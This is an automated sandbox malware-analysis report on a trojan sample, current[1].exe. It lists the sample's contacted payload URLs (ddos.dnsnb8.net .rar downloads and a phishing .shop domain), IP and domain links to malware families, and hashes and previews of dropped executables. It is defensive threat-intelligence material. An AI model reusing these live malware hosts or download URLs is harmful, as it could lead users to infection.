http://www.scintilla.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.spaceblue.comMathias	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarm	jJEAWO.exe, 00000001.00000002.1862651851.000000000105E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707811358.0000000000894000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707606358.0000000002BA5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.smartsharesystems.com/Morten	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarE0	jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683579567.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.develop.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.lua.org	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarT	jJEAWO.exe, 00000001.00000003.1683506510.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, jJEAWO.exe, 00000001.00000003.1683352875.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://www.spaceblue.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
http://www.baanboard.com	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://www.cloudflare.com/learning/ddos/glossary/malware/	current[1].exe, 00000000.00000003.1707640338.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.1707606358.0000000002BA5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.develop.comDeepak	SciTE.exe.1.dr	false	URL Reputation: safe	unknown
https://sofahuntingslidedine.shop/apik	current[1].exe, 00000000.00000003.2020633565.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000003.2020575396.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, current[1].exe, 00000000.00000002.2053363980.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://ddos.dnsnb8.net:799/cj//k1.rarcC:	jJEAWO.exe, 00000001.00000003.1683352875.00000000010EB000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k2.rarN	jJEAWO.exe, 00000001.00000002.1862651851.00000000010B4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
44.221.84.105	ddos.dnsnb8.net	United States		14618	AMAZON-AESUS	false
188.114.96.3	sofahuntingslidedine.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1480805
Start date and time:	2024-07-25 00:24:54 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	current[1].exe
Detection:	MAL
Classification:	mal100.spre.troj.evad.winEXE@6/15@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 25 Number of non-executed functions: 170
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.89.179.12
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: current[1].exe

Simulations

Behavior and APIs

Time	Type	Description
18:25:48	API Interceptor	1x Sleep call for process: current[1].exe modified
18:26:03	API Interceptor	2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
44.221.84.105	C[MbrWriter].exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	cerber.exe	Get hash	malicious	Bdaejec, Cerber, CryptOne	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	CDC14C6C7E3AB6373BAF5031C597D302F68791ED3B0A98E446B150A1F22C8D0F.exe	Get hash	malicious	Bdaejec, RedLine	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	C7F05A51EF9CD4372057583AF5DDEF7EA41D377ECBDB06AA604DE8B59F277BD5.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	CA023814AA064AC9CD4015CF89EEC32339828447BB34D2F45C44EF9D064603FF.exe	Get hash	malicious	Bdaejec, RedLine	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	C72AA9C4DF96E6768A8A1DB299A8E787AC729FAA40C536FA4344F82D4670A947.exe	Get hash	malicious	Bdaejec	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	C80F5360D6E3484FF09BD86186BAFFA361803879E40CEAA9AF984CDF68FFEA5B.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k2.rar
	C5665332E8CA3D76FB4B583B3FF97D1F99828F33CAD445B22020147BF9079F59.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	ddos.dnsnb8.net:799/cj//k5.rar
	C57B86BE5A9FA166A946D78D8B63D9817FF3E14DF83ABD88B654BD66167696DE.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	ddos.dnsnb8.net:799/cj//k3.rar
	C5FB4D13BB4B34F9670BC238A047B53C4392B299139C3DA8B2B70BA9DDD3DB2D.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	ddos.dnsnb8.net:799/cj//k3.rar
188.114.96.3	https://www.trypineappledigital.agency/	Get hash	malicious	Unknown	Browse	daytimeadmirable.icu/favicon.ico
	Quotation.xls	Get hash	malicious	Remcos	Browse	tny.wtf/jk8Z5I
	DRAFT AWB and DRAFT Commercial invoice.xls	Get hash	malicious	Remcos	Browse	tny.wtf/cyd
	S004232824113048.xls	Get hash	malicious	Remcos, DBatLoader	Browse	wx.ax/Xm6
	http://comicextra.me/favicon.ico	Get hash	malicious	Unknown	Browse	comicextra.org/favicon.ico
	AED 47,000.exe	Get hash	malicious	FormBook	Browse	www.yi992.com/iuti/
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eadkqsUM/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/4jaIXkvS/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/yavjNkfZ/download
	Purchase Order - P04737.xls	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	tny.wtf/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sofahuntingslidedine.shop	My documents2402.zip	Get hash	malicious	Unknown	Browse	104.21.16.80
	invoice-02-2025-pdf.exe	Get hash	malicious	LummaC, MicroClip	Browse	172.67.166.242
	file.exe	Get hash	malicious	LummaC	Browse	104.21.16.80
	file.exe	Get hash	malicious	LummaC	Browse	104.21.16.80
ddos.dnsnb8.net	C[MbrWriter].exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	cerber.exe	Get hash	malicious	Bdaejec, Cerber, CryptOne	Browse	44.221.84.105
	CDC14C6C7E3AB6373BAF5031C597D302F68791ED3B0A98E446B150A1F22C8D0F.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	C7F05A51EF9CD4372057583AF5DDEF7EA41D377ECBDB06AA604DE8B59F277BD5.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	CA023814AA064AC9CD4015CF89EEC32339828447BB34D2F45C44EF9D064603FF.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	C72AA9C4DF96E6768A8A1DB299A8E787AC729FAA40C536FA4344F82D4670A947.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	C80F5360D6E3484FF09BD86186BAFFA361803879E40CEAA9AF984CDF68FFEA5B.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	C5665332E8CA3D76FB4B583B3FF97D1F99828F33CAD445B22020147BF9079F59.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	C57B86BE5A9FA166A946D78D8B63D9817FF3E14DF83ABD88B654BD66167696DE.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105
	C5FB4D13BB4B34F9670BC238A047B53C4392B299139C3DA8B2B70BA9DDD3DB2D.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://itsssl.com/privadas	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://bagi-bagi-hadiahx-dxnafry.danaespay.my.id/?its.dana.co.id	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://staking-pyth-network.pages.dev/assests/	Get hash	malicious	Unknown	Browse	172.67.15.166
	http://redirected-protocol.pages.dev/wallet.html	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	http://yxhi-dana-resmireal.ditzzzz.biz.id/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://vrfyauthgate.cognito806.workers.dev/jsdisabled/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://konkurs-yuliya.blog/final	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://16161f7701ac1d6d5bd0c79b2f8.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://cvxap3654.zxabta.com/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://works-micro5o4t-fix.torrydrollmann007.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
AMAZON-AESUS	C[MbrWriter].exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	CDC14C6C7E3AB6373BAF5031C597D302F68791ED3B0A98E446B150A1F22C8D0F.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	C7F05A51EF9CD4372057583AF5DDEF7EA41D377ECBDB06AA604DE8B59F277BD5.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	CA023814AA064AC9CD4015CF89EEC32339828447BB34D2F45C44EF9D064603FF.exe	Get hash	malicious	Bdaejec, RedLine	Browse	44.221.84.105
	C72AA9C4DF96E6768A8A1DB299A8E787AC729FAA40C536FA4344F82D4670A947.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	C80F5360D6E3484FF09BD86186BAFFA361803879E40CEAA9AF984CDF68FFEA5B.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	C5665332E8CA3D76FB4B583B3FF97D1F99828F33CAD445B22020147BF9079F59.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse	44.221.84.105
	C57B86BE5A9FA166A946D78D8B63D9817FF3E14DF83ABD88B654BD66167696DE.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105
	C5FB4D13BB4B34F9670BC238A047B53C4392B299139C3DA8B2B70BA9DDD3DB2D.exe	Get hash	malicious	Bdaejec, Lokibot	Browse	44.221.84.105
	C1E3DBF11B5B3D434C8026BB344D5E9FD6DABA717622CCFC4E07CADF051CBA72.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	44.221.84.105

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	fElFkLtGq3.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	ayBPBYjQKF.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	zHkxxA7lpi.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	b6f90f3c2a3ee2ba6791c9c15670964e370639b531481a294e7b89d800e1ca40.exe	Get hash	malicious	Bdaejec, BlackMoon	Browse	188.114.96.3
	zHkxxA7lpi.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	B111141595018D6980A609315F572F827D7FA913454A785EEBC7376019ECE195.exe	Get hash	malicious	Bdaejec	Browse	188.114.96.3
	7lojIffD2v.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	l5UyqU9SY6.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	zPmKNeJBku.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exe	Get hash	malicious	Bdaejec	Browse	188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\jJEAWO.exe	C[MbrWriter].exe	Get hash	malicious	Bdaejec	Browse
	cerber.exe	Get hash	malicious	Bdaejec, Cerber, CryptOne	Browse
	CDC14C6C7E3AB6373BAF5031C597D302F68791ED3B0A98E446B150A1F22C8D0F.exe	Get hash	malicious	Bdaejec, RedLine	Browse
	C7F05A51EF9CD4372057583AF5DDEF7EA41D377ECBDB06AA604DE8B59F277BD5.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse
	CA023814AA064AC9CD4015CF89EEC32339828447BB34D2F45C44EF9D064603FF.exe	Get hash	malicious	Bdaejec, RedLine	Browse
	C72AA9C4DF96E6768A8A1DB299A8E787AC729FAA40C536FA4344F82D4670A947.exe	Get hash	malicious	Bdaejec	Browse
	C80F5360D6E3484FF09BD86186BAFFA361803879E40CEAA9AF984CDF68FFEA5B.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse
	C5665332E8CA3D76FB4B583B3FF97D1F99828F33CAD445B22020147BF9079F59.exe	Get hash	malicious	Bdaejec, SmokeLoader	Browse
	C57B86BE5A9FA166A946D78D8B63D9817FF3E14DF83ABD88B654BD66167696DE.exe	Get hash	malicious	Bdaejec, Lokibot	Browse
	C5FB4D13BB4B34F9670BC238A047B53C4392B299139C3DA8B2B70BA9DDD3DB2D.exe	Get hash	malicious	Bdaejec, Lokibot	Browse

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jJEAWO.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19456
Entropy (8bit):	6.591470713849028
Encrypted:	false
SSDEEP:	384:1FrSPXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:uRQGPL4vzZq2o9W7GsxBbPr
MD5:	7510DEEF719FE82CACA2370AF0A54E98
SHA1:	9A4245234DCD7AEA33AE054FE07E26F38856F720
SHA-256:	3B21E55F46DEE0CC7A4D59A08B75BAC3FCDE210D736D84AB6DB686C929605AA4
SHA-512:	2E4231632F22BD0701342CC5B12915A3B690487E0D5DCA9D35E2E6E1069459C0E4FBE87618AE5E4DB9E8AAE13239764F7F7D4BC818A427683FC5F4947A5D8206
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y\|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jJEAWO.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2389504
Entropy (8bit):	6.731347566495252
Encrypted:	false
SSDEEP:	49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
MD5:	64FF8D1F20A270865D648DEEAFD75760
SHA1:	50F0EA8EF7DD77D384D775FD58EB28F24F4ECC40
SHA-256:	85B29754FDEA0C24C594C7A4776667F4AE4730CD366D90750E3C7EE10654D930
SHA-512:	0D347664A0490EB936699F73B68287AB34DBC9F494D87CE5134268C7D4A0FDB3D75451B8B19D92D672727BAF0C94AA97E093B38F16E4640005EFC1EE6B3AC111
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jJEAWO.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	31744
Entropy (8bit):	6.36667634136341
Encrypted:	false
SSDEEP:	768:uWQ3655Kv1X/qY1MSdEZQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdEOGCq2iW7z
MD5:	6E0F900BFF1ED0B0081985507F0A25BB
SHA1:	271200B62D6FBEA94FDCE3EEC9CFBA4ED61B360B
SHA-256:	F4EAC4DFB65C77C597EEA8505E0B55B8959500C66BAFC4DE0AEF5BDB375F04AA
SHA-512:	7BE86030133941B63419FB15D293CC8E3D10ACDC6AF925837CD19ECC0642427E697A02565E03F4B12171476788B6A3832414DFA4A2B91C7E4B5EBA3DF3382D72
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_current[1].exe_9b5737f5faee579b493102f3d6aa2427c2a8d_78bff3be_07a493f7-7c08-4e63-830e-5d8ecd9668e0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9081122640215564
Encrypted:	false
SSDEEP:	96:36lIuu2Q5sjMQmB+QjfHQXIDcQtc6bcE1cw3b+HbHg/8BRTf3ZFEOyKZ02g9J+F7:2IZ2Q5G0Dff0jp6czuiFQZ24IO8n
MD5:	A3C4FF968F8D0017C3422C7D680CDF95
SHA1:	8747040B34876D67FDB1C8041774314C03FD4161
SHA-256:	49C18A2F5A191C498FC56B0724478A68C5BF0A0BD57E3F3D6E3655E4906B7F8A
SHA-512:	A60F7F2DDE86170C2595DBF9F5A19BD4E44C41AA7F06D66B1EFADCC2A6CAD5CE838FC421F5F7A3DE8F9EE3D6A80B036B60786313FC019333C7D86B6018A86FCE
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.3.3.5.8.0.3.0.2.4.5.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.3.3.5.8.0.6.7.7.4.5.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.a.4.9.3.f.7.-.7.c.0.8.-.4.e.6.3.-.8.3.0.e.-.5.d.8.e.c.d.9.6.6.8.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.4.b.7.b.6.9.d.-.4.f.d.b.-.4.f.6.8.-.8.0.c.a.-.b.a.5.d.f.8.8.f.e.c.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.u.r.r.e.n.t.[.1.]...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.0.c.-.0.0.0.1.-.0.0.1.4.-.8.8.1.0.-.2.0.6.d.1.8.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.3.a.1.5.b.2.c.0.f.6.f.8.d.1.6.e.5.6.6.9.0.6.a.8.9.6.a.5.8.2.6.0.0.0.0.0.7.0.4.!.0.0.0.0.a.7.3.c.d.6.b.b.4.b.4.2.e.1.9.7.5.6.d.5.6.2.8.9.3.2.4.7.8.7.b.5.6.2.b.0.7.2.2.5.!.c.u.r.r.e.n.t.[.1.]...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_jJEAWO.exe_2bd22f57251f20d34b755a755d907fabae7c39b_c18945cf_77b172d6-41a2-4dd7-bb1f-84845737eb17\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.974377820708394
Encrypted:	false
SSDEEP:	192:MVHu7ebTca0wfRKjE/JXzuiFrZ24IO8tw:DOTchwfRKjqzuiFrY4IO8t
MD5:	874A2BFCA5FBCD2C8C819073E6485062
SHA1:	DC1963C78A8CBFAF216E983197CF1CA2132DAEDE
SHA-256:	FCD20E0047D5F417F4BD744B19EEDF80231627F3A1A4A186DA1FA2135CDEBD5B
SHA-512:	9484218065AE405686C59C1CB41E720C29C4945E074D3A42187CBA5952E0010C8D2034BF6C19A9BB8B0173AA99B87262EBA417E5A4EB1333019E7218E18FC4D1
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.3.3.5.5.0.7.8.1.9.4.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.3.3.5.5.1.4.0.6.9.4.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.b.1.7.2.d.6.-.4.1.a.2.-.4.d.d.7.-.b.b.1.f.-.8.4.8.4.5.7.3.7.e.b.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.8.e.7.c.f.5.-.8.a.3.9.-.4.e.d.6.-.a.b.3.c.-.7.9.9.d.3.5.5.1.e.7.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.J.E.A.W.O...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.1.c.-.0.0.0.1.-.0.0.1.4.-.0.3.4.0.-.2.9.6.d.1.8.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.4.f.2.5.6.8.a.f.9.0.5.e.f.7.f.3.8.6.6.8.0.0.9.c.c.9.3.a.a.6.5.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.j.J.E.A.W.O...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CEF.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jul 24 22:26:20 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	47022
Entropy (8bit):	2.6718574764031544
Encrypted:	false
SSDEEP:	192:vhpLb7XxfH1u3qYORBXxU9zld+x/GfC3I+wc2ptuiIBaLDjw9ha8iX:jdfH1u6fRBBU9zl8x/GK32ptqaL/w7FU
MD5:	B47386966ACEED76EA6D8C080F196F1E
SHA1:	DFB0FD9C151D6D8860F298ECCC569FB7BD97958B
SHA-256:	89ABA5167D9956E62C10E2BCC8D5D35BE54D5014FA9A487DE619CE0C4C36587C
SHA-512:	1615C831FC4F2422F01E8F1C515AA6389914B88475AD091961F18438B07C126E60C0B0FA0972D166E8B9A7D46E3AEDE3B8FBF7AFBEEBAD3392BD1E8E21376F54
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........f............4...............H.......T...H.......t...R(..........`.......8...........T............9...~......................................................................................................eJ...... .......GenuineIntel............T...........i..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D7C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8320
Entropy (8bit):	3.695195473514329
Encrypted:	false
SSDEEP:	192:R6l7wVeJpI6Nsp6Y9yESUMHgmfaZpDu89b58sfLzm:R6lXJG6Q6YEESUMHgmfar5PfO
MD5:	1227BA44148DA7B7D7065F7A537E177B
SHA1:	EF5E3733E28E64DE0188C3D1B83F1B32F7BEF692
SHA-256:	77EB26D149462050715613896D6290E0803FFD7961F7CD695014557BE01E402A
SHA-512:	0A53718CA93228223906A5F4637CAA2D2C95857A072A0199A336491370EBAE9317D950EE6F5EBC7DD4C512E1C92EA14A1E789E82B9719BC5A10446CCDBA3186B
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 